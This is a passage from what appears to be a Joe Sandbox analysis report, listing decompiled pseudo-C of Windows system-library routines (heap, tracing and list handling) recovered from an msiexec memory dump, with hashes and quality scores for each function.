                              				void* _t47;
                              				signed char* _t56;
                              				signed char* _t58;
                              
                              				_t48 = __ecx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t44 = __ecx;
                              				_v12 = __edx;
                              				_v8 = __ecx;
                              				_t22 = E04D27D50();
                              				_t58 = 0x7ffe0384;
                              				if(_t22 == 0) {
                              					_t23 = 0x7ffe0384;
                              				} else {
                              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              				}
                              				if( *_t23 != 0) {
                              					_t24 =  *0x4df7b9c; // 0x0
                              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                              					_t23 = L04D24620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                              					_t56 = _t23;
                              					if(_t56 != 0) {
                              						_t56[0x24] = _a4;
                              						_t56[0x28] = _a8;
                              						_t56[6] = 0x1420;
                              						_t56[0x20] = _v12;
                              						_t14 =  &(_t56[0x2c]); // 0x2c
                              						E04D4F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                              						if(E04D27D50() != 0) {
                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              						}
                              						_push(_t56);
                              						_push(_t47 - 0x20);
                              						_push(0x402);
                              						_push( *_t58 & 0x000000ff);
                              						E04D49AE0();
                              						_t23 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                              					}
                              				}
                              				return _t23;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3672f6e6e7d37c82eeccee0d92a7d1c9a1253e592655a7b116855fd6b61672b
                              • Instruction ID: e58ebbf02c5cc9956423f6a39b60e3ad7beddb22a76b97f97b625901d76e5045
                              • Opcode Fuzzy Hash: e3672f6e6e7d37c82eeccee0d92a7d1c9a1253e592655a7b116855fd6b61672b
                              • Instruction Fuzzy Hash: 3E21DEB1A00654AFD721DF68D980F6AB7B8FF58718F04006AF904C7B90D634ED50CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E04D490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                              				intOrPtr* _v0;
                              				void* _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				char _v36;
                              				void* _t38;
                              				intOrPtr _t41;
                              				void* _t44;
                              				signed int _t45;
                              				intOrPtr* _t49;
                              				signed int _t57;
                              				signed int _t58;
                              				intOrPtr* _t59;
                              				void* _t62;
                              				void* _t63;
                              				void* _t65;
                              				void* _t66;
                              				signed int _t69;
                              				intOrPtr* _t70;
                              				void* _t71;
                              				intOrPtr* _t72;
                              				intOrPtr* _t73;
                              				char _t74;
                              
                              				_t65 = __edx;
                              				_t57 = _a4;
                              				_t32 = __ecx;
                              				_v8 = __edx;
                              				_t3 = _t32 + 0x14c; // 0x14c
                              				_t70 = _t3;
                              				_v16 = __ecx;
                              				_t72 =  *_t70;
                              				while(_t72 != _t70) {
                              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                              						L24:
                              						_t72 =  *_t72;
                              						continue;
                              					}
                              					_t30 = _t72 + 0x10; // 0x10
                              					if(E04D5D4F0(_t30, _t65, _t57) == _t57) {
                              						return 0xb7;
                              					}
                              					_t65 = _v8;
                              					goto L24;
                              				}
                              				_t61 = _t57;
                              				_push( &_v12);
                              				_t66 = 0x10;
                              				if(E04D3E5E0(_t57, _t66) < 0) {
                              					return 0x216;
                              				}
                              				_t73 = L04D24620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                              				if(_t73 == 0) {
                              					_t38 = 0xe;
                              					return _t38;
                              				}
                              				_t9 = _t73 + 0x10; // 0x10
                              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                              				E04D4F3E0(_t9, _v8, _t57);
                              				_t41 =  *_t70;
                              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                              					_t62 = 3;
                              					asm("int 0x29");
                              					_push(_t62);
                              					_push(_t57);
                              					_push(_t73);
                              					_push(_t70);
                              					_t71 = _t62;
                              					_t74 = 0;
                              					_v36 = 0;
                              					_t63 = E04D3A2F0(_t62, _t71, 1, 6,  &_v36);
                              					if(_t63 == 0) {
                              						L20:
                              						_t44 = 0x57;
                              						return _t44;
                              					}
                              					_t45 = _v12;
                              					_t58 = 0x1c;
                              					if(_t45 < _t58) {
                              						goto L20;
                              					}
                              					_t69 = _t45 / _t58;
                              					if(_t69 == 0) {
                              						L19:
                              						return 0xe8;
                              					}
                              					_t59 = _v0;
                              					do {
                              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                              							goto L18;
                              						}
                              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                              						 *_t59 = _t49;
                              						if( *_t49 != 0x53445352) {
                              							goto L18;
                              						}
                              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                              						return 0;
                              						L18:
                              						_t63 = _t63 + 0x1c;
                              						_t74 = _t74 + 1;
                              					} while (_t74 < _t69);
                              					goto L19;
                              				}
                              				 *_t73 = _t41;
                              				 *((intOrPtr*)(_t73 + 4)) = _t70;
                              				 *((intOrPtr*)(_t41 + 4)) = _t73;
                              				 *_t70 = _t73;
                              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                              				return 0;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                              • Instruction ID: b500fb9a96da2fc98f4114f119fac233d27a81dac52f4ddb175ea24c1b59946e
                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                              • Instruction Fuzzy Hash: 7C2165B1A00605EFEB21DF69C544EAAF7F8FB84354F1484AAE985A7250D330FD45CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E04D33B7A(void* __ecx) {
                              				signed int _v8;
                              				char _v12;
                              				intOrPtr _v20;
                              				intOrPtr _t17;
                              				intOrPtr _t26;
                              				void* _t35;
                              				void* _t38;
                              				void* _t41;
                              				intOrPtr _t44;
                              
                              				_t17 =  *0x4df84c4; // 0x0
                              				_v12 = 1;
                              				_v8 =  *0x4df84c0 * 0x4c;
                              				_t41 = __ecx;
                              				_t35 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4df84c0 * 0x4c);
                              				if(_t35 == 0) {
                              					_t44 = 0xc0000017;
                              				} else {
                              					_push( &_v8);
                              					_push(_v8);
                              					_push(_t35);
                              					_push(4);
                              					_push( &_v12);
                              					_push(0x6b);
                              					_t44 = E04D4AA90();
                              					_v20 = _t44;
                              					if(_t44 >= 0) {
                              						E04D4FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4df84c0 * 0xc);
                              						_t38 = _t35;
                              						if(_t35 < _v8 + _t35) {
                              							do {
                              								asm("movsd");
                              								asm("movsd");
                              								asm("movsd");
                              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                              							} while (_t38 < _v8 + _t35);
                              							_t44 = _v20;
                              						}
                              					}
                              					_t26 =  *0x4df84c4; // 0x0
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                              				}
                              				return _t44;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12df366244129751250981d08b5cd2d804d88a8b48613ae18283886f8df74ba9
                              • Instruction ID: c1792f6008f9b655b35e29d2ee94ee34ecee041c800d1711e9067ec88bc30c09
                              • Opcode Fuzzy Hash: 12df366244129751250981d08b5cd2d804d88a8b48613ae18283886f8df74ba9
                              • Instruction Fuzzy Hash: 53219F72A00118AFDB15DF58CE81B5AB7BDFB44708F150068F908AB251D775FD11DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E04D86CF0(void* __edx, intOrPtr _a4, short _a8) {
                              				char _v8;
                              				char _v12;
                              				char _v16;
                              				char _v20;
                              				char _v28;
                              				char _v36;
                              				char _v52;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed char* _t21;
                              				void* _t24;
                              				void* _t36;
                              				void* _t38;
                              				void* _t46;
                              
                              				_push(_t36);
                              				_t46 = __edx;
                              				_v12 = 0;
                              				_v8 = 0;
                              				_v20 = 0;
                              				_v16 = 0;
                              				if(E04D27D50() == 0) {
                              					_t21 = 0x7ffe0384;
                              				} else {
                              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                              				}
                              				if( *_t21 != 0) {
                              					_t21 =  *[fs:0x30];
                              					if((_t21[0x240] & 0x00000004) != 0) {
                              						if(E04D27D50() == 0) {
                              							_t21 = 0x7ffe0385;
                              						} else {
                              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                              						}
                              						if(( *_t21 & 0x00000020) != 0) {
                              							_t56 = _t46;
                              							if(_t46 == 0) {
                              								_t46 = 0x4ce5c80;
                              							}
                              							_push(_t46);
                              							_push( &_v12);
                              							_t24 = E04D3F6E0(_t36, 0, _t46, _t56);
                              							_push(_a4);
                              							_t38 = _t24;
                              							_push( &_v28);
                              							_t21 = E04D3F6E0(_t38, 0, _t46, _t56);
                              							if(_t38 != 0) {
                              								if(_t21 != 0) {
                              									E04D87016(_a8, 0, 0, 0,  &_v36,  &_v28);
                              									L04D22400( &_v52);
                              								}
                              								_t21 = L04D22400( &_v28);
                              							}
                              						}
                              					}
                              				}
                              				return _t21;
                              			}




















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f5b37bdadcea927faba16a9b51710a4288f934d7df11efcc2028f82b960aa95
                              • Instruction ID: b7600d9c400e97a4ea5721428bbd50b2d5159db1239e8640270423649a28d3ce
                              • Opcode Fuzzy Hash: 1f5b37bdadcea927faba16a9b51710a4288f934d7df11efcc2028f82b960aa95
                              • Instruction Fuzzy Hash: 2621D372600644ABD311EF69CA44B77B7ECEF91768F04045AF94087261E734F509C6A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E04DD070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                              				char _v8;
                              				intOrPtr _v11;
                              				signed int _v12;
                              				intOrPtr _v15;
                              				signed int _v16;
                              				intOrPtr _v28;
                              				void* __ebx;
                              				char* _t32;
                              				signed int* _t38;
                              				signed int _t60;
                              
                              				_t38 = __ecx;
                              				_v16 = __edx;
                              				_t60 = E04DD07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                              				if(_t60 != 0) {
                              					_t7 = _t38 + 0x38; // 0x29cd5903
                              					_push( *_t7);
                              					_t9 = _t38 + 0x34; // 0x6adeeb00
                              					_push( *_t9);
                              					_v12 = _a8 << 0xc;
                              					_t11 = _t38 + 4; // 0x5de58b5b
                              					_push(0x4000);
                              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                              					E04DCAFDE( &_v8,  &_v12);
                              					E04DD1293(_t38, _v28, _t60);
                              					if(E04D27D50() == 0) {
                              						_t32 = 0x7ffe0380;
                              					} else {
                              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              						_t21 = _t38 + 0x3c; // 0xc3595e5f
                              						E04DC14FB(_t38,  *_t21, _v11, _v15, 0xd);
                              					}
                              				}
                              				return  ~_t60;
                              			}














                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                              • Instruction ID: 7aa4bc7070385fc6a215a19ad4f188b075a3ae1c429e27fb0b32ffa346573b8a
                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                              • Instruction Fuzzy Hash: 3821C236304204AFD716DF18C884B6ABBA5FBC4758F048569F9959F385D630E909CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E04D2AE73(intOrPtr __ecx, void* __edx) {
                              				intOrPtr _v8;
                              				void* _t19;
                              				char* _t22;
                              				signed char* _t24;
                              				intOrPtr _t25;
                              				intOrPtr _t27;
                              				void* _t31;
                              				intOrPtr _t36;
                              				char* _t38;
                              				signed char* _t42;
                              
                              				_push(__ecx);
                              				_t31 = __edx;
                              				_v8 = __ecx;
                              				_t19 = E04D27D50();
                              				_t38 = 0x7ffe0384;
                              				if(_t19 != 0) {
                              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              				} else {
                              					_t22 = 0x7ffe0384;
                              				}
                              				_t42 = 0x7ffe0385;
                              				if( *_t22 != 0) {
                              					if(E04D27D50() == 0) {
                              						_t24 = 0x7ffe0385;
                              					} else {
                              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              					}
                              					if(( *_t24 & 0x00000010) != 0) {
                              						goto L17;
                              					} else {
                              						goto L3;
                              					}
                              				} else {
                              					L3:
                              					_t27 = E04D27D50();
                              					if(_t27 != 0) {
                              						_t27 =  *[fs:0x30];
                              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                              					}
                              					if( *_t38 != 0) {
                              						_t27 =  *[fs:0x30];
                              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                              							goto L5;
                              						}
                              						_t27 = E04D27D50();
                              						if(_t27 != 0) {
                              							_t27 =  *[fs:0x30];
                              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                              						}
                              						if(( *_t42 & 0x00000020) != 0) {
                              							L17:
                              							_t25 = _v8;
                              							_t36 = 0;
                              							if(_t25 != 0) {
                              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                              							}
                              							_t27 = E04D87794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                              						}
                              						goto L5;
                              					} else {
                              						L5:
                              						return _t27;
                              					}
                              				}
                              			}














                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                              • Instruction ID: d26f75beb8e8b640f0ff9f7d80bfe3d18e93b275e770bc59672463767427f52d
                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                              • Instruction Fuzzy Hash: EB21AC717016919BEB269B28CA84B2977E8FB54748F1900E2DD048B7A2F778FC41C6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E04D87794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				intOrPtr _t21;
                              				void* _t24;
                              				intOrPtr _t25;
                              				void* _t36;
                              				short _t39;
                              				signed char* _t42;
                              				unsigned int _t46;
                              				void* _t50;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t21 =  *0x4df7b9c; // 0x0
                              				_t46 = _a8;
                              				_v12 = __edx;
                              				_v8 = __ecx;
                              				_t4 = _t46 + 0x2e; // 0x2e
                              				_t36 = _t4;
                              				_t24 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                              				_t50 = _t24;
                              				if(_t50 != 0) {
                              					_t25 = _a4;
                              					if(_t25 == 5) {
                              						L3:
                              						_t39 = 0x14b1;
                              					} else {
                              						_t39 = 0x14b0;
                              						if(_t25 == 6) {
                              							goto L3;
                              						}
                              					}
                              					 *((short*)(_t50 + 6)) = _t39;
                              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                              					_t11 = _t50 + 0x2c; // 0x2c
                              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                              					E04D4F3E0(_t11, _a12, _t46);
                              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                              					if(E04D27D50() == 0) {
                              						_t42 = 0x7ffe0384;
                              					} else {
                              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					}
                              					_push(_t50);
                              					_t19 = _t36 - 0x20; // 0xe
                              					_push(0x403);
                              					_push( *_t42 & 0x000000ff);
                              					E04D49AE0();
                              					_t24 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                              				}
                              				return _t24;
                              			}














                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f23bd898612da04b9f74ded6e5bb1fc1aa7ff7a903b83bcbf913d9da656e7d3
                              • Instruction ID: 312ce0faf973850a3ba135ccc7e23f50b4dd0f6b3523aaf546b730056fc8eb92
                              • Opcode Fuzzy Hash: 1f23bd898612da04b9f74ded6e5bb1fc1aa7ff7a903b83bcbf913d9da656e7d3
                              • Instruction Fuzzy Hash: 06219D72A00604ABC725EF69DC90EABB7B8FF88744F10056DE90AC7750E634E900CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E04D3FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				intOrPtr _v8;
                              				void* _t19;
                              				intOrPtr _t29;
                              				intOrPtr _t32;
                              				intOrPtr _t35;
                              				intOrPtr _t37;
                              				intOrPtr* _t40;
                              
                              				_t35 = __edx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t37 = 0;
                              				_v8 = __edx;
                              				_t29 = __ecx;
                              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                              					L3:
                              					_t19 = _a4 - 4;
                              					if(_t19 != 0) {
                              						if(_t19 != 1) {
                              							L7:
                              							return _t37;
                              						}
                              						if(_t35 == 0) {
                              							L11:
                              							_t37 = 0xc000000d;
                              							goto L7;
                              						}
                              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                              							_t35 = _v8;
                              						}
                              						 *((intOrPtr*)(_t40 + 4)) = _t35;
                              						goto L7;
                              					}
                              					if(_t29 == 0) {
                              						goto L11;
                              					}
                              					_t32 =  *_t40;
                              					if(_t32 != 0) {
                              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                              						E04D176E2( *_t40);
                              					}
                              					 *_t40 = _t29;
                              					goto L7;
                              				}
                              				_t40 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                              				if(_t40 == 0) {
                              					_t37 = 0xc0000017;
                              					goto L7;
                              				}
                              				_t35 = _v8;
                              				 *_t40 = 0;
                              				 *((intOrPtr*)(_t40 + 4)) = 0;
                              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                              				goto L3;
                              			}











                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                              • Instruction ID: ccf60baa95e547115ddd8099e9f96e95341d040d751c6499c1fbea870cac7615
                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                              • Instruction Fuzzy Hash: C8217972A40A48DFD731CF4AD644A66B7E5FB94B12F24816EE98997620E734FC00DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E04D09240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                              				intOrPtr _t33;
                              				intOrPtr _t37;
                              				intOrPtr _t41;
                              				intOrPtr* _t46;
                              				void* _t48;
                              				intOrPtr _t50;
                              				intOrPtr* _t60;
                              				void* _t61;
                              				intOrPtr _t62;
                              				intOrPtr _t65;
                              				void* _t66;
                              				void* _t68;
                              
                              				_push(0xc);
                              				_push(0x4ddf708);
                              				E04D5D08C(__ebx, __edi, __esi);
                              				_t65 = __ecx;
                              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                              				if( *(__ecx + 0x24) != 0) {
                              					_push( *(__ecx + 0x24));
                              					E04D495D0();
                              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                              				}
                              				L6();
                              				L6();
                              				_push( *((intOrPtr*)(_t65 + 0x28)));
                              				E04D495D0();
                              				_t33 =  *0x4df84c4; // 0x0
                              				L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                              				_t37 =  *0x4df84c4; // 0x0
                              				L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                              				_t41 =  *0x4df84c4; // 0x0
                              				E04D22280(L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4df86b4);
                              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                              				_t46 = _t65 + 0xe8;
                              				_t62 =  *_t46;
                              				_t60 =  *((intOrPtr*)(_t46 + 4));
                              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                              					_t61 = 3;
                              					asm("int 0x29");
                              					_push(_t65);
                              					_t66 = _t61;
                              					_t23 = _t66 + 0x14; // 0x8df8084c
                              					_push( *_t23);
                              					E04D495D0();
                              					_t24 = _t66 + 0x10; // 0x89e04d8b
                              					_push( *_t24);
                              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                              					_t48 = E04D495D0();
                              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                              					return _t48;
                              				} else {
                              					 *_t60 = _t62;
                              					 *((intOrPtr*)(_t62 + 4)) = _t60;
                              					 *(_t68 - 4) = 0xfffffffe;
                              					E04D09325();
                              					_t50 =  *0x4df84c4; // 0x0
                              					return E04D5D0D1(L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                              				}
                              			}
















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 475f5aa562678aba1d0ea37ae31cfb11229e74dd3b950648932ee37478be69f5
                              • Instruction ID: bc85423b7b85832965d04d3d5ef7c39f4dd4f63f00920eff8d69f901463be5d1
                              • Opcode Fuzzy Hash: 475f5aa562678aba1d0ea37ae31cfb11229e74dd3b950648932ee37478be69f5
                              • Instruction Fuzzy Hash: 60211671241640DFD721EF28CA50B5AB7B9FF18708F1485A8E049876B2CB34F941DB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E04D3B390(void* __ecx, intOrPtr _a4) {
                              				signed int _v8;
                              				signed char _t12;
                              				signed int _t16;
                              				signed int _t21;
                              				void* _t28;
                              				signed int _t30;
                              				signed int _t36;
                              				signed int _t41;
                              
                              				_push(__ecx);
                              				_t41 = _a4 + 0xffffffb8;
                              				E04D22280(_t12, 0x4df8608);
                              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                              				asm("sbb edi, edi");
                              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                              				_v8 = _t36;
                              				asm("lock cmpxchg [ebx], ecx");
                              				_t30 = 1;
                              				if(1 != 1) {
                              					while(1) {
                              						_t21 = _t30 & 0x00000006;
                              						_t16 = _t30;
                              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                              						asm("lock cmpxchg [edi], esi");
                              						if(_t16 == _t30) {
                              							break;
                              						}
                              						_t30 = _t16;
                              					}
                              					_t36 = _v8;
                              					if(_t21 == 2) {
                              						_t16 = E04D400C2(0x4df8608, 0, _t28);
                              					}
                              				}
                              				if(_t36 != 0) {
                              					_t16 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                              				}
                              				return _t16;
                              			}












                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 261126b98da6f2cd19269f0412b85b83cf57003f4bf17a0718ee9cf6670bfb2f
                              • Instruction ID: dac828920e81c9e8be087718d2416f0dfcf92df48657d1248a1ee7dfeb5d93d7
